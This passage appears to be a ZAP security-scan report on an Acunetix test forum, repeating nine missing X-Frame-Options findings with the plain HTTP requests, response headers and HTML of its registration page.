entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using 